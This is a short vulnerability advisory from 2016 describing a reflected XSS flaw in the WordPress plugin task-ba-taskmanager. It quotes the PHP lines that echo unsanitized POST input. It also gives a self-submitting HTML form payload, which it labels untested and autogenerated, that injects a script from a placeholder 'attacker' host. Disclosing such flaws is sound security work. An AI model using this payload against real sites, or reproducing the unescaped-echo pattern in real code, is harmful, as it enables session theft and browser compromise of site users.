Advisory #: 1001
Title: Reflected XSS in wordpress plugin task-ba-taskmanager v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/task-ba-taskmanager
Downloads: 169
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: task-ba-taskmanager
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./task-ba-taskmanager/inc/category.edit-page.php: 224:<input name="task_ba_categorie_id" type="hidden" value="<?php echo $_POST["task_ba_categorie_id"]; ?>" size="10"> 225:<input name="create_categorie" type="text" size="30" maxlength="25" placeholder="Kategorie Name" value="<?php echo $_POST["task_ba_categorie_name"]; ?>"><br> 226:<textarea name="create_categorie_description" type="text" cols="50" rows="10" maxlength="1000" placeholder="Beschreibung der Kategorie" ><?php echo $_POST["task_ba_categorie_description"]; ?></textarea> The variable task_ba_categorie_id appears to send unsanitized data back to the users browser via POST request.
CVE-ID: Not Released
File:./task-ba-taskmanager/inc/category.edit-page.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html
  3. <form name=TheForm action=http://[target]/wp-content/plugins/task-ba-taskmanager/inc/category.edit-page.php method=post> <input type=hidden name=task_ba_categorie_id value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;> </form> <script> document.TheForm.submit(); </script>